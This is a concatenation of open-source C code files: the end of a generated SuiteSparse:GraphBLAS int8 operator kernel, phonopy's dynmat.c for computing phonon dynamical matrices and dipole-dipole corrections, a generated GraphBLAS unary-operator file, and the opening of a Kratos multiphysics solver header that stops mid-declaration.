return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__second_int8)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__second_int8)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type int8_t
int8_t bwork = (*((int8_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__second_int8)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__second_int8)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__second_int8)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_01__second_int8)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_01_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__second_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_03__second_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_03_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__second_int8)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *Cx = (int8_t *) Cx_output ;
int8_t x = (*((int8_t *) x_input)) ;
int8_t *Bx = (int8_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
int8_t bij = GBX (Bx, p, false) ;
Cx [p] = bij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
int8_t *Cx = (int8_t *) Cx_output ;
int8_t *Ax = (int8_t *) Ax_input ;
int8_t y = (*((int8_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
; ;
Cx [p] = y ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
int8_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t x = (*((const int8_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
int8_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = y ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t y = (*((const int8_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
dynmat.c | /* Copyright (C) 2015 Atsushi Togo */
/* All rights reserved. */
/* This file is part of phonopy. */
/* Redistribution and use in source and binary forms, with or without */
/* modification, are permitted provided that the following conditions */
/* are met: */
/* * Redistributions of source code must retain the above copyright */
/* notice, this list of conditions and the following disclaimer. */
/* * Redistributions in binary form must reproduce the above copyright */
/* notice, this list of conditions and the following disclaimer in */
/* the documentation and/or other materials provided with the */
/* distribution. */
/* * Neither the name of the phonopy project nor the names of its */
/* contributors may be used to endorse or promote products derived */
/* from this software without specific prior written permission. */
/* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS */
/* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT */
/* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS */
/* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE */
/* COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, */
/* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, */
/* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; */
/* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER */
/* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT */
/* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN */
/* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE */
/* POSSIBILITY OF SUCH DAMAGE. */
#include <math.h>
#include <stdlib.h>
#include <dynmat.h>
#define PI 3.14159265358979323846
static void get_dynmat_ij(double *dynamical_matrix,
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const double *mass,
const int *s2p_map,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j);
static void get_dm(double dm_real[3][3],
double dm_imag[3][3],
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j,
const int k);
static double get_dielectric_part(const double q_cart[3],
PHPYCONST double dielectric[3][3]);
static void get_KK(double *dd_part, /* [natom, 3, natom, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
const double q_cart[3],
const double *q_direction_cart,
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double lambda,
const double tolerance);
static void make_Hermitian(double *mat, const int num_band);
static void multiply_borns(double *dd,
const double *dd_in,
const int num_patom,
PHPYCONST double (*born)[3][3]);
int dym_get_dynamical_matrix_at_q(double *dynamical_matrix,
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const double *mass,
const int *s2p_map,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int with_openmp)
{
int i, j, ij;
if (with_openmp) {
#pragma omp parallel for
for (ij = 0; ij < num_patom * num_patom ; ij++) {
get_dynmat_ij(dynamical_matrix,
num_patom,
num_satom,
fc,
q,
svecs,
multi,
mass,
s2p_map,
p2s_map,
charge_sum,
ij / num_patom, /* i */
ij % num_patom); /* j */
}
} else {
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
get_dynmat_ij(dynamical_matrix,
num_patom,
num_satom,
fc,
q,
svecs,
multi,
mass,
s2p_map,
p2s_map,
charge_sum,
i,
j);
}
}
}
make_Hermitian(dynamical_matrix, num_patom * 3);
return 0;
}
void dym_get_recip_dipole_dipole(double *dd, /* [natom, 3, natom, 3, (real,imag)] */
const double *dd_q0, /* [natom, 3, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
const double q_cart[3],
const double *q_direction_cart, /* must be pointer */
PHPYCONST double (*born)[3][3],
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double factor, /* 4pi/V*unit-conv */
const double lambda,
const double tolerance)
{
int i, k, l, adrs, adrs_sum;
double *dd_tmp;
dd_tmp = NULL;
dd_tmp = (double*) malloc(sizeof(double) * num_patom * num_patom * 18);
for (i = 0; i < num_patom * num_patom * 18; i++) {
dd[i] = 0;
dd_tmp[i] = 0;
}
get_KK(dd_tmp,
G_list,
num_G,
num_patom,
q_cart,
q_direction_cart,
dielectric,
pos,
lambda,
tolerance);
multiply_borns(dd, dd_tmp, num_patom, born);
for (i = 0; i < num_patom; i++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * num_patom * 9 + k * num_patom * 3 + i * 3 + l;
adrs_sum = i * 9 + k * 3 + l;
dd[adrs * 2] -= dd_q0[adrs_sum * 2];
dd[adrs * 2 + 1] -= dd_q0[adrs_sum * 2 + 1];
}
}
}
for (i = 0; i < num_patom * num_patom * 18; i++) {
dd[i] *= factor;
}
/* This may not be necessary. */
/* make_Hermitian(dd, num_patom * 3); */
free(dd_tmp);
dd_tmp = NULL;
}
void dym_get_recip_dipole_dipole_q0(double *dd_q0, /* [natom, 3, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
PHPYCONST double (*born)[3][3],
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double lambda,
const double tolerance)
{
int i, j, k, l, adrs_tmp, adrs, adrsT;
double zero_vec[3];
double *dd_tmp1, *dd_tmp2;
dd_tmp1 = NULL;
dd_tmp1 = (double*) malloc(sizeof(double) * num_patom * num_patom * 18);
dd_tmp2 = NULL;
dd_tmp2 = (double*) malloc(sizeof(double) * num_patom * num_patom * 18);
for (i = 0; i < num_patom * num_patom * 18; i++) {
dd_tmp1[i] = 0;
dd_tmp2[i] = 0;
}
zero_vec[0] = 0;
zero_vec[1] = 0;
zero_vec[2] = 0;
get_KK(dd_tmp1,
G_list,
num_G,
num_patom,
zero_vec,
NULL,
dielectric,
pos,
lambda,
tolerance);
multiply_borns(dd_tmp2, dd_tmp1, num_patom, born);
for (i = 0; i < num_patom * 18; i++) {
dd_q0[i] = 0;
}
for (i = 0; i < num_patom; i++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * 9 + k * 3 + l;
for (j = 0; j < num_patom; j++) {
adrs_tmp = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l ;
dd_q0[adrs * 2] += dd_tmp2[adrs_tmp * 2];
dd_q0[adrs * 2 + 1] += dd_tmp2[adrs_tmp * 2 + 1];
}
}
}
}
/* Summation over another atomic index */
/* for (j = 0; j < num_patom; j++) { */
/* for (k = 0; k < 3; k++) { /\* alpha *\/ */
/* for (l = 0; l < 3; l++) { /\* beta *\/ */
/* adrs = j * 9 + k * 3 + l; */
/* for (i = 0; i < num_patom; i++) { */
/* adrs_tmp = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l ; */
/* dd_q0[adrs * 2] += dd_tmp2[adrs_tmp * 2]; */
/* dd_q0[adrs * 2 + 1] += dd_tmp2[adrs_tmp * 2 + 1]; */
/* } */
/* } */
/* } */
/* } */
for (i = 0; i < num_patom; i++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * 9 + k * 3 + l;
adrsT = i * 9 + l * 3 + k;
dd_q0[adrs * 2] += dd_q0[adrsT * 2];
dd_q0[adrs * 2] /= 2;
dd_q0[adrsT * 2] = dd_q0[adrs * 2];
dd_q0[adrs * 2 + 1] -= dd_q0[adrsT * 2 + 1];
dd_q0[adrs * 2 + 1] /= 2;
dd_q0[adrsT * 2 + 1] = -dd_q0[adrs * 2 + 1];
}
}
}
free(dd_tmp1);
dd_tmp1 = NULL;
free(dd_tmp2);
dd_tmp2 = NULL;
}
void dym_get_charge_sum(double (*charge_sum)[3][3],
const int num_patom,
const double factor, /* 4pi/V*unit-conv and denominator */
const double q_cart[3],
PHPYCONST double (*born)[3][3])
{
int i, j, k, a, b;
double (*q_born)[3];
q_born = (double (*)[3]) malloc(sizeof(double[3]) * num_patom);
for (i = 0; i < num_patom; i++) {
for (j = 0; j < 3; j++) {
q_born[i][j] = 0;
}
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < 3; j++) {
for (k = 0; k < 3; k++) {
q_born[i][j] += q_cart[k] * born[i][k][j];
}
}
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
for (a = 0; a < 3; a++) {
for (b = 0; b < 3; b++) {
charge_sum[i * num_patom + j][a][b] =
q_born[i][a] * q_born[j][b] * factor;
}
}
}
}
free(q_born);
q_born = NULL;
}
/* fc[num_patom, num_satom, 3, 3] */
/* dm[num_comm_points, num_patom * 3, num_patom *3] */
/* comm_points[num_satom, num_patom, 27, 3] */
/* shortest_vectors[num_satom, num_patom, 27, 3] */
/* multiplicities[num_satom, num_patom] */
void dym_transform_dynmat_to_fc(double *fc,
const double *dm,
PHPYCONST double (*comm_points)[3],
PHPYCONST double (*shortest_vectors)[27][3],
const int *multiplicities,
const double *masses,
const int *s2pp_map,
const int *fc_index_map,
const int num_patom,
const int num_satom)
{
int i, j, k, l, m, N, adrs, multi;
double coef, phase, cos_phase, sin_phase;
N = num_satom / num_patom;
for (i = 0; i < num_patom * num_satom * 9; i++) {
fc[i] = 0;
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_satom; j++) {
coef = sqrt(masses[i] * masses[s2pp_map[j]]) / N;
for (k = 0; k < N; k++) {
cos_phase = 0;
sin_phase = 0;
multi = multiplicities[j * num_patom + i];
for (l = 0; l < multi; l++) {
phase = 0;
for (m = 0; m < 3; m++) {
phase -= comm_points[k][m] *
shortest_vectors[j * num_patom + i][l][m];
}
cos_phase += cos(phase * 2 * PI);
sin_phase += sin(phase * 2 * PI);
}
cos_phase /= multi;
sin_phase /= multi;
for (l = 0; l < 3; l++) {
for (m = 0; m < 3; m++) {
adrs = k * num_patom * num_patom * 18 + i * num_patom * 18 +
l * num_patom * 6 + s2pp_map[j] * 6 + m * 2;
fc[fc_index_map[i] * num_satom * 9 + j * 9 + l * 3 + m] +=
(dm[adrs] * cos_phase - dm[adrs + 1] * sin_phase) * coef;
}
}
}
}
}
}
static void get_dynmat_ij(double *dynamical_matrix,
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const double *mass,
const int *s2p_map,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j)
{
int k, l, adrs;
double mass_sqrt;
double dm_real[3][3], dm_imag[3][3];
mass_sqrt = sqrt(mass[i] * mass[j]);
for (k = 0; k < 3; k++) {
for (l = 0; l < 3; l++) {
dm_real[k][l] = 0;
dm_imag[k][l] = 0;
}
}
for (k = 0; k < num_satom; k++) { /* Lattice points of right index of fc */
if (s2p_map[k] != p2s_map[j]) {
continue;
}
get_dm(dm_real,
dm_imag,
num_patom,
num_satom,
fc,
q,
svecs,
multi,
p2s_map,
charge_sum,
i,
j,
k);
}
for (k = 0; k < 3; k++) {
for (l = 0; l < 3; l++) {
adrs = (i * 3 + k) * num_patom * 3 + j * 3 + l;
dynamical_matrix[adrs * 2] = dm_real[k][l] / mass_sqrt;
dynamical_matrix[adrs * 2 + 1] = dm_imag[k][l] / mass_sqrt;
}
}
}
static void get_dm(double dm_real[3][3],
double dm_imag[3][3],
const int num_patom,
const int num_satom,
const double *fc,
const double q[3],
PHPYCONST double (*svecs)[27][3],
const int *multi,
const int *p2s_map,
PHPYCONST double (*charge_sum)[3][3],
const int i,
const int j,
const int k)
{
int l, m;
double phase, cos_phase, sin_phase, fc_elem;
cos_phase = 0;
sin_phase = 0;
for (l = 0; l < multi[k * num_patom + i]; l++) {
phase = 0;
for (m = 0; m < 3; m++) {
phase += q[m] * svecs[k * num_patom + i][l][m];
}
cos_phase += cos(phase * 2 * PI) / multi[k * num_patom + i];
sin_phase += sin(phase * 2 * PI) / multi[k * num_patom + i];
}
for (l = 0; l < 3; l++) {
for (m = 0; m < 3; m++) {
if (charge_sum) {
fc_elem = (fc[p2s_map[i] * num_satom * 9 + k * 9 + l * 3 + m] +
charge_sum[i * num_patom + j][l][m]);
} else {
fc_elem = fc[p2s_map[i] * num_satom * 9 + k * 9 + l * 3 + m];
}
dm_real[l][m] += fc_elem * cos_phase;
dm_imag[l][m] += fc_elem * sin_phase;
}
}
}
static double get_dielectric_part(const double q_cart[3],
PHPYCONST double dielectric[3][3])
{
int i, j;
double x[3];
double sum;
for (i = 0; i < 3; i++) {
x[i] = 0;
for (j = 0; j < 3; j++) {
x[i] += dielectric[i][j] * q_cart[j];
}
}
sum = 0;
for (i = 0; i < 3; i++) {
sum += q_cart[i] * x[i];
}
return sum;
}
static void get_KK(double *dd_part, /* [natom, 3, natom, 3, (real,imag)] */
PHPYCONST double (*G_list)[3], /* [num_G, 3] */
const int num_G,
const int num_patom,
const double q_cart[3],
const double *q_direction_cart,
PHPYCONST double dielectric[3][3],
PHPYCONST double (*pos)[3], /* [num_patom, 3] */
const double lambda,
const double tolerance)
{
int i, j, k, l, g, adrs;
double q_K[3];
double norm, cos_phase, sin_phase, phase, dielectric_part, exp_damp, L2;
double KK[3][3];
L2 = 4 * lambda * lambda;
/* sum over K = G + q and over G (i.e. q=0) */
/* q_direction has values for summation over K at Gamma point. */
/* q_direction is NULL for summation over G */
for (g = 0; g < num_G; g++) {
norm = 0;
for (i = 0; i < 3; i++) {
q_K[i] = G_list[g][i] + q_cart[i];
norm += q_K[i] * q_K[i];
}
if (sqrt(norm) < tolerance) {
if (!q_direction_cart) {
continue;
} else {
dielectric_part = get_dielectric_part(q_direction_cart, dielectric);
for (i = 0; i < 3; i++) {
for (j = 0; j < 3; j++) {
KK[i][j] =
q_direction_cart[i] * q_direction_cart[j] / dielectric_part;
}
}
}
} else {
dielectric_part = get_dielectric_part(q_K, dielectric);
exp_damp = exp(-dielectric_part / L2);
for (i = 0; i < 3; i++) {
for (j = 0; j < 3; j++) {
KK[i][j] = q_K[i] * q_K[j] / dielectric_part * exp_damp;
}
}
}
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
phase = 0;
for (k = 0; k < 3; k++) {
/* For D-type dynamical matrix */
/* phase += (pos[i][k] - pos[j][k]) * q_K[k]; */
/* For C-type dynamical matrix */
phase += (pos[i][k] - pos[j][k]) * G_list[g][k];
}
phase *= 2 * PI;
cos_phase = cos(phase);
sin_phase = sin(phase);
for (k = 0; k < 3; k++) {
for (l = 0; l < 3; l++) {
adrs = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l;
dd_part[adrs * 2] += KK[k][l] * cos_phase;
dd_part[adrs * 2 + 1] += KK[k][l] * sin_phase;
}
}
}
}
}
}
static void make_Hermitian(double *mat, const int num_band)
{
int i, j, adrs, adrsT;
for (i = 0; i < num_band; i++) {
for (j = i; j < num_band; j++) {
adrs = i * num_band + j * 1;
adrs *= 2;
adrsT = j * num_band + i * 1;
adrsT *= 2;
/* real part */
mat[adrs] += mat[adrsT];
mat[adrs] /= 2;
/* imaginary part */
mat[adrs + 1] -= mat[adrsT+ 1];
mat[adrs + 1] /= 2;
/* store */
mat[adrsT] = mat[adrs];
mat[adrsT + 1] = -mat[adrs + 1];
}
}
}
static void multiply_borns(double *dd,
const double *dd_in,
const int num_patom,
PHPYCONST double (*born)[3][3])
{
int i, j, k, l, m, n, adrs, adrs_in;
double zz;
for (i = 0; i < num_patom; i++) {
for (j = 0; j < num_patom; j++) {
for (k = 0; k < 3; k++) { /* alpha */
for (l = 0; l < 3; l++) { /* beta */
adrs = i * num_patom * 9 + k * num_patom * 3 + j * 3 + l;
for (m = 0; m < 3; m++) { /* alpha' */
for (n = 0; n < 3; n++) { /* beta' */
adrs_in = i * num_patom * 9 + m * num_patom * 3 + j * 3 + n ;
zz = born[i][m][k] * born[j][n][l];
dd[adrs * 2] += dd_in[adrs_in * 2] * zz;
dd[adrs * 2 + 1] += dd_in[adrs_in * 2 + 1] * zz;
}
}
}
}
}
}
}
|
GB_unaryop__identity_fp32_int64.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__identity_fp32_int64
// op(A') function: GB_tran__identity_fp32_int64
// C type: float
// A type: int64_t
// cast: float cij = (float) aij
// unaryop: cij = aij
#define GB_ATYPE \
int64_t
#define GB_CTYPE \
float
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
int64_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = x ;
// casting
#define GB_CASTING(z, x) \
float z = (float) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_IDENTITY || GxB_NO_FP32 || GxB_NO_INT64)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__identity_fp32_int64
(
float *restrict Cx,
const int64_t *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__identity_fp32_int64
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
residualbased_elimination_builder_and_solver_componentwise.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Riccardo Rossi
//
//
#if !defined(KRATOS_RESIDUAL_BASED_ELIMINATION_BUILDER_AND_SOLVERCOMPONENTWISE )
#define KRATOS_RESIDUAL_BASED_ELIMINATION_BUILDER_AND_SOLVERCOMPONENTWISE
/* System includes */
#include <set>
/* External includes */
#ifdef KRATOS_SMP_OPENMP
#include <omp.h>
#endif
/* Project includes */
#include "includes/define.h"
#include "solving_strategies/builder_and_solvers/residualbased_elimination_builder_and_solver.h"
#include "includes/global_pointer_variables.h"
#include "utilities/builtin_timer.h"
namespace Kratos
{
/**@name Kratos Globals */
/*@{ */
/*@} */
/**@name Type Definitions */
/*@{ */
/*@} */
/**@name Enum's */
/*@{ */
/*@} */
/**@name Functions */
/*@{ */
/*@} */
/**@name Kratos Classes */
/*@{ */
/** Short class definition.
Detail class definition.
This is a specialization of the standard buliding strategy to the case in which a single variable is to be used in the
building.
the creation of the DofList and the construction of the system matrix is in this case much faster
as the neighborhood relationships are considered to be known
\URL[Example of use html]{ extended_documentation/no_ex_of_use.html}
\URL[Example of use pdf]{ extended_documentation/no_ex_of_use.pdf}
\URL[Example of use doc]{ extended_documentation/no_ex_of_use.doc}
\URL[Example of use ps]{ extended_documentation/no_ex_of_use.ps}
\URL[Extended documentation html]{ extended_documentation/no_ext_doc.html}
\URL[Extended documentation pdf]{ extended_documentation/no_ext_doc.pdf}
\URL[Extended documentation doc]{ extended_documentation/no_ext_doc.doc}
\URL[Extended documentation ps]{ extended_documentation/no_ext_doc.ps}
*/
template<class TSparseSpace,
class TDenseSpace ,
class TLinearSolver,
class TVariableType
>
class ResidualBasedEliminationBuilderAndSolverComponentwise
